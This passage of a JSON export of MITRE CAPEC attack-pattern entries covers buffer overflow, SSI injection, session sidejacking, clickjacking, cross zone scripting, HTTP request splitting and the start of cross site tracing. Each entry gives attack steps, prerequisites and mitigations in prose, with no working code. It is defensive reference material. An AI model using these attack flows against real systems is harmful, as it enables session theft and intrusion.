software."]},"Example_Instances":{"Example":["The most straightforward example is an application that reads in input from the user and stores it in an internal buffer but does not check that the size of the input data is less than or equal to the size of the buffer. If the user enters excessive length data, the buffer may overflow leading to the application crashing, or worse, enabling the user to cause execution of injected code.","Many web servers enforce security in web applications through the use of filter plugins. An example is the SiteMinder plugin used for authentication. An overflow in such a plugin, possibly through a long URL or redirect parameter, can allow an adversary not only to bypass the security checks but also execute arbitrary code on the target web server in the context of the user that runs the web server process."]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"120"},{"CWE_ID":"119"},{"CWE_ID":"131"},{"CWE_ID":"129"},{"CWE_ID":"805"},{"CWE_ID":"680"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"WASC","Entry_ID":"07","Entry_Name":"Buffer Overflow"},{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Buffer overflow attack"}]},"References":{"Reference":{"External_Reference_ID":"REF-620","Section":"Buffer Overflow"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Phases, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Examples-Instances, Indicators-Warnings_of_Attack, Probing_Techniques, Related_Vulnerabilities, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}]}},"101":{"ID":"101","Name":"Server Side Include (SSI) Injection","Abstraction":"Detailed","Status":"Draft","Description":"An attacker can use Server Side Include (SSI) Injection to send code to a web application that then gets executed by the web server. Doing so enables the attacker to achieve similar results to Cross Site Scripting, viz., arbitrary code execution and information disclosure, albeit on a more limited scale, since the SSI directives are nowhere near as powerful as a full-fledged scripting language. Nonetheless, the attacker can conveniently gain access to sensitive files, such as password files, and execute shell commands.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"253"},{"Nature":"CanPrecede","CAPEC_ID":"600"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine applicability] The adversary determines whether server side includes are enabled on the target web server.","Technique":["Look for popular page file names. The attacker will look for .shtml, .shtm, .asp, .aspx, and other well-known strings in URLs to help determine whether SSI functionality is enabled.","Fetch .htaccess file. In Apache web server installations, the .htaccess file may enable server side includes in specific locations. In those cases, the .htaccess file lives inside the directory where SSI is enabled, and is theoretically fetchable from the web server. Although most web servers deny fetching the .htaccess file, a misconfigured server will allow it. Thus, an attacker will frequently try it."]},{"Step":"2","Phase":"Experiment","Description":"[Find Injection Point] Look for user controllable input, including HTTP headers, that can carry server side include directives to the web server.","Technique":["Use a spidering tool to follow and record all links. Make special note of any links that include parameters in the URL.","Use a proxy tool to record all links visited during a manual traversal of the web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms."]},{"Step":"3","Phase":"Exploit","Description":"[Inject SSI] Using the found injection point, the adversary sends arbitrary code to be inlcuded by the application on the server side. They may then need to view a particular page in order to have the server execute the include directive and run a command or open a file on behalf of the adversary."}]},"Prerequisites":{"Prerequisite":["A web server that supports server side includes and has them enabled","User controllable input that can carry include directives to the web server"]},"Skills_Required":{"Skill":["The attacker needs to be aware of SSI technology, determine the nature of injection and be able to craft input that results in the SSI directives being executed.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack. Determining whether the server supports SSI does not require special tools, and nor does injecting directives that get executed. Spidering tools can make the task of finding and following links easier."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"}]},"Mitigations":{"Mitigation":["Set the OPTIONS IncludesNOEXEC in the global access.conf file or local .htaccess (Apache) file to deny SSI execution in directories that do not need them","All user controllable input must be appropriately sanitized before use in the application. This includes omitting, or encoding, certain characters or strings that have the potential of being interpreted as part of an SSI directive","Server Side Includes must be enabled only if there is a strong business reason to do so. Every additional component enabled on the web server increases the attack surface as well as administrative overhead"]},"Example_Instances":{"Example":{"p":["Consider a website hosted on a server that permits Server Side Includes (SSI), such as Apache with the \\"Options Includes\\" directive enabled.","Whenever an error occurs, the HTTP Headers along with the entire request are logged, which can then be displayed on a page that allows review of such errors. A malicious user can inject SSI directives in the HTTP Headers of a request designed to create an error.","When these logs are eventually reviewed, the server parses the SSI directives and executes them."]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"97"},{"CWE_ID":"74"},{"CWE_ID":"20"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"WASC","Entry_ID":"36","Entry_Name":"SSI Injection"},{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Server-Side Includes (SSI) Injection"}]},"References":{"Reference":{"External_Reference_ID":"REF-610","Section":"Testing for SSI Injection"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Attack_Patterns, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}]}},"102":{"ID":"102","Name":"Session Sidejacking","Abstraction":"Detailed","Status":"Draft","Description":"Session sidejacking takes advantage of an unencrypted communication channel between a victim and target system. The attacker sniffs traffic on a network looking for session tokens in unencrypted traffic. Once a session token is captured, the attacker performs malicious actions by using the stolen token with the targeted application to impersonate the victim. This attack is a specific method of session hijacking, which is exploiting a valid session token to gain unauthorized access to a target system or information. Other methods to perform a session hijacking are session fixation, cross-site scripting, or compromising a user or server machine and stealing the session token.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"593"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Detect Unprotected Session Token Transfer] The attacker sniffs on the wireless network to detect unencrypted traffic that contains session tokens.","Technique":"The attacker uses a network sniffer tool like ferret or hamster to monitor the wireless traffic at a WiFi hotspot while examining it for evidence of transmittal of session tokens in unencrypted or recognizably encrypted form. An attacker applies their knowledge of the manner by which session tokens are generated and transmitted by various target systems to identify the session tokens."},{"Step":"2","Phase":"Experiment","Description":"[Capture session token] The attacker uses sniffing tools to capture a session token from traffic."},{"Step":"3","Phase":"Experiment","Description":"[Insert captured session token] The attacker attempts to insert a captured session token into communication with the targeted application to confirm viability for exploitation."},{"Step":"4","Phase":"Exploit","Description":"[Session Token Exploitation] The attacker leverages the captured session token to interact with the targeted application in a malicious fashion, impersonating the victim."}]},"Prerequisites":{"Prerequisite":["An attacker and the victim are both using the same WiFi network.","The victim has an active session with a target system.","The victim is not using a secure channel to communicate with the target system (e.g. SSL, VPN, etc.)","The victim initiated communication with a target system that requires transfer of the session token or the target application uses AJAX and thereby periodically \\"rings home\\" asynchronously using the session token"]},"Skills_Required":{"Skill":["Easy to use tools exist to automate this attack.",{"Level":"Low"}]},"Resources_Required":{"Resource":"A packet sniffing tool, such as wireshark, can be used to capture session information."},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Availability","Impact":"Unreliable Execution"}]},"Mitigations":{"Mitigation":["Make sure that HTTPS is used to communicate with the target system. Alternatively, use VPN if possible. It is important to ensure that all communication between the client and the server happens via an encrypted secure channel.","Modify the session token with each transmission and protect it with cryptography. Add the idea of request sequencing that gives the server an ability to detect replay attacks."]},"Example_Instances":{"Example":"The attacker and the victim are using the same WiFi public hotspot. When the victim connects to the hotspot, they has a hosted e-mail account open. This e-mail account uses AJAX on the client side which periodically asynchronously connects to the server side and transfers, amongst other things, the user\'s session token to the server. The communication is supposed to happen over HTTPS. However, the configuration in the public hotspot initially disallows the HTTPS connection (or any other connection) between the victim and the hosted e-mail servers because the victim first needs to register with the hotspot. The victim does so, but their e-mail client already defaulted to using a connection without HTTPS, since it was denied access the first time. Victim\'s session token is now flowing unencrypted between the victim\'s browser and the hosted e-mail servers. The attacker leverages this opportunity to capture the session token and gain access to the victim\'s hosted e-mail account."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"294"},{"CWE_ID":"522"},{"CWE_ID":"523"},{"CWE_ID":"319"},{"CWE_ID":"614"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances, Execution_Flow"}]}},"103":{"ID":"103","Name":"Clickjacking","Abstraction":"Standard","Status":"Draft","Description":"In a clickjacking attack the victim is tricked into unknowingly initiating some action in one system while interacting with the UI from a seemingly completely different system. While being logged in to some target system, the victim visits the adversary\'s malicious site which displays a UI that the victim wishes to interact with. In reality, the clickjacked page has a transparent layer above the visible UI with action controls that the adversary wishes the victim to execute. The victim clicks on buttons or other UI elements they see on the page which actually triggers the action controls in the transparent overlaying layer. Depending on what that action control is, the adversary may have just tricked the victim into executing some potentially privileged (and most certainly undesired) functionality in the target system to which the victim is authenticated. The basic problem here is that there is a dichotomy between what the victim thinks they are clicking on versus what they are actually clicking on.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"173"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Experiment","Description":"[Craft a clickjacking page] The adversary utilizes web page layering techniques to try to craft a malicious clickjacking page","Technique":["The adversary leveraged iframe overlay capabilities to craft a malicious clickjacking page","The adversary leveraged Flash file overlay capabilities to craft a malicious clickjacking page","The adversary leveraged Silverlight overlay capabilities to craft a malicious clickjacking page","The adversary leveraged cross-frame scripting to craft a malicious clickjacking page"]},{"Step":"2","Phase":"Exploit","Description":"[Adversary lures victim to clickjacking page] Adversary utilizes some form of temptation, misdirection or coercion to lure the victim to loading and interacting with the clickjacking page in a way that increases the chances that the victim will click in the right areas.","Technique":["Lure the victim to the malicious site by sending the victim an e-mail with a URL to the site.","Lure the victim to the malicious site by manipulating URLs on a site trusted by the victim.","Lure the victim to the malicious site through a cross-site scripting attack."]},{"Step":"3","Phase":"Exploit","Description":"[Trick victim into interacting with the clickjacking page in the desired manner] The adversary tricks the victim into clicking on the areas of the UI which contain the hidden action controls and thereby interacts with the target system maliciously with the victim\'s level of privilege.","Technique":["Hide action controls over very commonly used functionality.","Hide action controls over very psychologically tempting content."]}]},"Prerequisites":{"Prerequisite":["The victim is communicating with the target application via a web based UI and not a thick client","The victim\'s browser security policies allow at least one of the following JavaScript, Flash, iFrames, ActiveX, or CSS.","The victim uses a modern browser that supports UI elements like clickable buttons (i.e. not using an old text only browser)","The victim has an active session with the target system.","The target system\'s interaction window is open in the victim\'s browser and supports the ability for initiating sensitive actions on behalf of the user in the target system"]},"Skills_Required":{"Skill":["Crafting the proper malicious site and luring the victim to this site are not trivial tasks.",{"Level":"High"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Availability","Impact":"Unreliable Execution"}]},"Mitigations":{"Mitigation":["If using the Firefox browser, use the NoScript plug-in that will help forbid iFrames.","Turn off JavaScript, Flash and disable CSS.","When maintaining an authenticated session with a privileged target system, do not use the same browser to navigate to unfamiliar sites to perform other activities. Finish working with the target system and logout first before proceeding to other tasks."]},"Example_Instances":{"Example":{"p":["A victim has an authenticated session with a site that provides an electronic payment service to transfer funds between subscribing members. At the same time, the victim receives an e-mail that appears to come from an online publication to which they subscribe with links to today\'s news articles. The victim clicks on one of these links and is taken to a page with the news story. There is a screen with an advertisement that appears on top of the news article with the \'skip this ad\' button. Eager to read the news article, the user clicks on this button. Nothing happens. The user clicks on the button one more time and still nothing happens.","In reality, the victim activated a hidden action control located in a transparent layer above the \'skip this ad\' button. The ad screen blocking the news article made it likely that the victim would click on the \'skip this ad\' button. Clicking on the button, actually initiated the transfer of $1000 from the victim\'s account with an electronic payment service to an adversary\'s account. Clicking on the \'skip this ad\' button the second time (after nothing seemingly happened the first time) confirmed the transfer of funds to the electronic payment service."]}},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"1021"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Clickjacking"}},"References":{"Reference":{"External_Reference_ID":"REF-619","Section":"Testing for Clickjacking"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Phases, Description Summary, Examples-Instances, Related_Weaknesses, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References, Taxonomy_Mappings"}]}},"104":{"ID":"104","Name":"Cross Zone Scripting","Abstraction":"Standard","Status":"Draft","Description":"An attacker is able to cause a victim to load content into their web-browser that bypasses security zone controls and gain access to increased privileges to execute scripting code or other web objects such as unsigned ActiveX controls or applets. This is a privilege elevation attack targeted at zone-based web-browser security. In a zone-based model, pages belong to one of a set of zones corresponding to the level of privilege assigned to that page. Pages in an untrusted zone would have a lesser level of access to the system and/or be restricted in the types of executable content it was allowed to invoke. In a cross-zone scripting attack, a page that should be assigned to a less privileged zone is granted the privileges of a more trusted zone. This can be accomplished by exploiting bugs in the browser, exploiting incorrect configuration in the zone controls, through a cross-site scripting attack that causes the attackers\' content to be treated as coming from a more trusted page, or by leveraging some piece of system functionality that is accessible from both the trusted and less trusted zone. This attack differs from \\"Restful Privilege Escalation\\" in that the latter correlates to the inadequate securing of RESTful access methods (such as HTTP DELETE) on the server, while cross-zone scripting attacks the concept of security zones as implemented by a browser.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"233","Exclude_Related":{"Exclude_ID":"515"}}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Find systems susceptible to the attack] Find systems that contain functionality that is accessed from both the internet zone and the local zone. There needs to be a way to supply input to that functionality from the internet zone and that original input needs to be used later on a page from a local zone.","Technique":"Leverage knowledge of common local zone functionality on targeted platforms to guide attempted injection of code through relevant internet zone mechanisms. In some cases this may be due to standard system configurations enabling shared functionality between internet and local zones. The attacker can search for indicators that these standard configurations are in place."},{"Step":"2","Phase":"Experiment","Description":"[Find the insertion point for the payload] The attacker first needs to find some system functionality or possibly another weakness in the system (e.g. susceptibility to cross site scripting) that would provide the attacker with a mechanism to deliver the payload (i.e. the code to be executed) to the user. The location from which this code is executed in the user\'s browser needs to be within the local machine zone.","Technique":"Finding weaknesses in functionality used by both privileged and unprivileged users."},{"Step":"3","Phase":"Exploit","Description":"[Craft and inject the payload] Develop the payload to be executed in the higher privileged zone in the user\'s browser. Inject the payload and attempt to lure the victim (if possible) into executing the functionality which unleashes the payload.","Technique":["The attacker makes it as likely as possible that the vulnerable functionality into which they have injected the payload has a high likelihood of being used by the victim.","Leverage cross-site scripting vulnerability to inject payload."]}]},"Prerequisites":{"Prerequisite":"The target must be using a zone-aware browser."},"Skills_Required":{"Skill":["Ability to craft malicious scripts or find them elsewhere and ability to identify functionality that is running web controls in the local zone and to find an injection vector into that functionality",{"Level":"Medium"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"}]},"Mitigations":{"Mitigation":["Disable script execution.","Ensure that sufficient input validation is performed for any potentially untrusted data before it is used in any privileged context or zone","Limit the flow of untrusted data into the privileged areas of the system that run in the higher trust zone","Limit the sites that are being added to the local machine zone and restrict the privileges of the code running in that zone to the bare minimum","Ensure proper HTML output encoding before writing user supplied data to the page"]},"Example_Instances":{"Example":"There was a cross zone scripting vulnerability discovered in Skype that allowed one user to upload a video with a maliciously crafted title that contains a script. Subsequently, when the victim attempts to use the \\"add video to chat\\" feature on attacker\'s video, the script embedded in the title of the video runs with local zone privileges. Skype is using IE web controls to render internal and external HTML pages. \\"Add video to chat\\" uses these web controls and they are running in the Local Zone. Any user who searched for the video in Skype with the same keywords as in the title field, would have the attackers\' code executing in their browser with local zone privileges to their host machine (e.g. applications on the victim\'s host system could be executed)."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"250"},{"CWE_ID":"638"},{"CWE_ID":"285"},{"CWE_ID":"116"},{"CWE_ID":"20"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow, Related_Attack_Patterns"}]}},"105":{"ID":"105","Name":"HTTP Request Splitting","Abstraction":"Detailed","Status":"Stable","Description":{"p":["An adversary abuses the flexibility and discrepancies in the parsing and interpretation of HTTP Request messages by different intermediary HTTP agents (e.g., load balancer, reverse proxy, web caching proxies, application firewalls, etc.) to split a single HTTP request into multiple unauthorized and malicious HTTP requests to a back-end HTTP agent (e.g., web server).","See CanPrecede relationships for possible consequences."]},"Extended_Description":{"p":["This entails the adversary injecting malicious user input into various standard and/or user defined HTTP headers within a HTTP Request through user input of Carriage Return (CR), Line Feed (LF), Horizontal Tab (HT), Space (SP) characters as well as other valid/RFC compliant special characters and unique character encoding. This malicious user input allows for web script to be injected in HTTP headers as well as into browser cookies or Ajax web/browser object parameters like XMLHttpRequest during implementation of asynchronous requests.","This attack is usually the result of the usage of outdated or incompatible HTTP protocol versions as well as lack of syntax checking and filtering of user input in the HTTP agents receiving HTTP messages in the path.","This differs from CAPEC-34 HTTP Response Splitting, which is usually an attempt to compromise a client agent (e.g., web browser) by sending malicious content in HTTP responses from back-end HTTP infrastructure. HTTP Request Splitting is an attempt to compromise a",{"em":"back-end HTTP agent"},"HTTP Smuggling (CAPEC-33 and CAPEC-273) is different from HTTP Splitting due to the fact it relies upon discrepancies in the interpretation of various HTTP Headers and message sizes and not solely user input of special characters and character encoding. HTTP Smuggling was established to circumvent mitigations against HTTP Request Splitting techniques."]},"Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"220"},{"Nature":"PeerOf","CAPEC_ID":"34"},{"Nature":"CanPrecede","CAPEC_ID":"115"},{"Nature":"CanPrecede","CAPEC_ID":"141"},{"Nature":"CanPrecede","CAPEC_ID":"63"},{"Nature":"CanPrecede","CAPEC_ID":"593"},{"Nature":"CanPrecede","CAPEC_ID":"148"},{"Nature":"CanPrecede","CAPEC_ID":"154"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey network to identify target] The adversary performs network reconnaissance by monitoring relevant traffic to identify the network path and parsing of the HTTP messages with the goal of identifying potential targets.","Technique":"Scan networks to fingerprint HTTP infrastructure and monitor HTTP traffic to identify HTTP network path with a tool such as a Network Protocol Analyzer."},{"Step":"1","Phase":"Experiment","Description":"[Identify vulnerabilities in targeted HTTP infrastructure and technologies] The adversary sends a variety of benign/ambiguous HTTP requests to observe responses from HTTP infrastructure in order to identify differences/discrepancies in the interpretation and parsing of HTTP requests by examining supported HTTP protocol versions, HTTP headers, syntax checking and input filtering."},{"Step":"2","Phase":"Experiment","Description":"[Cause differential HTTP responses by experimenting with identified HTTP Request vulnerabilities] The adversary sends maliciously crafted HTTP requests with custom strings and embedded web scripts and objects in HTTP headers to interfere with the parsing of intermediary and back-end HTTP infrastructure, followed by normal/benign HTTP request from the adversary or a random user. The intended consequences of the malicious HTTP requests will be observed in the HTTP infrastructure response to the normal/benign HTTP request to confirm applicability of identified vulnerabilities in the adversary\'s plan of attack.","Technique":["Continue the monitoring of HTTP traffic.",{"p":["Utilize different sequences of special characters (CR - Carriage Return, LF - Line Feed, HT - Horizontal Tab, SP - Space and etc.) to bypass filtering and back-end encoding and to embed:","to utilize additional special characters (e.g., > and <) filtered by the target HTTP agent.","Note that certain special characters and character encoding may be applicable only to intermediary and front-end agents with rare configurations or that are not RFC compliant."],"ul":{"li":["additional HTTP Requests with their own headers","malicious web scripts into parameters of HTTP Request headers (e.g., browser cookies like Set-Cookie or Ajax web/browser object parameters like XMLHttpRequest)","adversary chosen encoding (e.g., UTF-7)"]}},"Follow an unrecognized (sometimes a RFC compliant) HTTP header with a subsequent HTTP request to potentially cause the HTTP request to be ignored and interpreted as part of the preceding HTTP request."]},{"Step":"1","Phase":"Exploit","Description":"[Perform HTTP Request Splitting attack] Using knowledge discovered in the experiment section above, smuggle a message to cause one of the consequences.","Technique":"Leverage techniques identified in the Experiment Phase."}]},"Prerequisites":{"Prerequisite":["An additional intermediary HTTP agent such as an application firewall or a web caching proxy between the adversary and the second agent such as a web server, that sends multiple HTTP messages over same network connection.","Differences in the way the two HTTP agents parse and interpret HTTP requests and its headers.","HTTP headers capable of being user-manipulated.","HTTP agents running on HTTP/1.0 or HTTP/1.1 that allow for Keep Alive mode, Pipelined queries, and Chunked queries and responses."]},"Skills_Required":{"Skill":["Detailed knowledge on HTTP protocol: request and response messages structure and usage of specific headers.",{"Level":"Medium"},"Detailed knowledge on how specific HTTP agents receive, send, process, interpret, and parse a variety of HTTP messages and headers.",{"Level":"Medium"},"Possess knowledge on the exact details in the discrepancies between several targeted HTTP agents in path of an HTTP message in parsing its message structure and individual headers.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"Tools capable of crafting malicious HTTP messages and monitoring HTTP messages responses."},"Indicators":{"Indicator":"Differences in requests processed by the two agents. This requires careful monitoring or a capable log analysis tool."},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":["Design: evaluate HTTP agents prior to deployment for parsing/interpretation discrepancies.","Configuration: front-end HTTP agents notice ambiguous requests.","Configuration: back-end HTTP agents reject ambiguous requests and close the network connection.","Configuration: Disable reuse of back-end connections.","Configuration: Use HTTP/2 for back-end connections.","Configuration: Use the same web server software for front-end and back-end server.","Implementation: Utilize a Web Application Firewall (WAF) that has built-in mitigation to detect abnormal requests/responses.","Configuration: Install latest vendor security patches available for both intermediary and back-end HTTP infrastructure (i.e. proxies and web servers)","Configuration: Ensure that HTTP infrastructure in the chain or network path utilize a strict uniform parsing process.","Implementation: Utilize intermediary HTTP infrastructure capable of filtering and/or sanitizing user-input."]},"Example_Instances":{"Example":{"p":"Microsoft Internet Explorer versions 5.01 SP4 and prior, 6.0 SP2 and prior, and 7.0 contain a vulnerability that could allow an unauthenticated, remote adversary to conduct HTTP request splitting and smuggling attacks. The vulnerability is due to an input validation error in the browser that allows adversaries to manipulate certain headers to expose the browser to HTTP request splitting and smuggling attacks. Attacks may include cross-site scripting, proxy cache poisoning, and session fixation. In certain instances, an exploit could allow the adversary to bypass web application firewalls or other filtering devices. Microsoft has confirmed the vulnerability and released software updates."}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"74"},{"CWE_ID":"138"},{"CWE_ID":"436"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"WASC","Entry_ID":"24","Entry_Name":"HTTP Request Splitting"}},"References":{"Reference":[{"External_Reference_ID":"REF-117"},{"External_Reference_ID":"REF-617"},{"External_Reference_ID":"REF-679"}]},"Notes":{"Note":["HTTP Splitting \u2013 \\"the act of forcing a sender of (HTTP) messages to emit data stream consisting of more messages than the sender\u2019s intension. The messages sent are 100% valid and RFC compliant\\" [REF-117].",{"Type":"Terminology"},"HTTP Smuggling \u2013 \\"the act of forcing a sender of (HTTP) messages to emit data stream which may be parsed as a different set of messages (i.e. dislocated message boundaries) than the sender\u2019s intention. This is done by virtue of forcing the sender to emit non-standard messages which can be interpreted in more than one way\\" [REF-117].",{"Type":"Terminology"},"HTTP Smuggling is an evolution of previous HTTP Splitting techniques which are commonly remediated against.",{"Type":"Relationship"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Related_Attack_Patterns, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated @Abstraction, References, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated @Status, Consequences, Description, Example_Instances, Execution_Flow, Extended_Description, Indicators, Mitigations, Notes, Prerequisites, References, Related_Attack_Patterns, Related_Weaknesses, Resources_Required, Skills_Required"}]}},"107":{"ID":"107","Name":"Cross Site Tracing","Abstraction":"Detailed","Status":"Draft","Description":"Cross Site Tracing (XST) enables an adversary to steal the victim\'s session cookie and possibly other authentication credentials transmitted in the header of the HTTP request when the victim\'s browser communicates to a destination system\'s web server. The adversary uses an XSS attack to have victim\'s browser sent an HTTP TRACE request to a destination web server, which will proceed to return a response to the victim\'s web browser that contains the original HTTP request in its body. Since the HTTP header of the original HTTP TRACE request had the victim\'s session cookie in it, that session cookie can now be picked off the HTTP TRACE response and sent to the adversary\'s malicious site. XST becomes relevant when direct access to the session cookie via the \\"document.cookie\\" object is disabled with the use of httpOnly attribute which ensures that the cookie can be transmitted in HTTP requests but cannot be accessed in other ways. Using SSL does not protect against XST. If the system with which the victim is interacting is susceptible to XSS, an adversary can exploit that weakness directly to get their malicious script to issue an HTTP TRACE request to the destination system\'s web server.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"593"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine if HTTP Trace is enabled] Determine if HTTP Trace is enabled at the web server with which the victim has an active session","Technique":"An adversary may issue an HTTP Trace request to the target web server and observe if the response arrives with the original request in the body of the response."},{"Step":"2","Phase":"Experiment","Description":"[Identify mechanism to launch HTTP Trace request] The adversary attempts to force the victim to issue an HTTP Trace request to the targeted application.","Technique":"The adversary probes for cross-site scripting 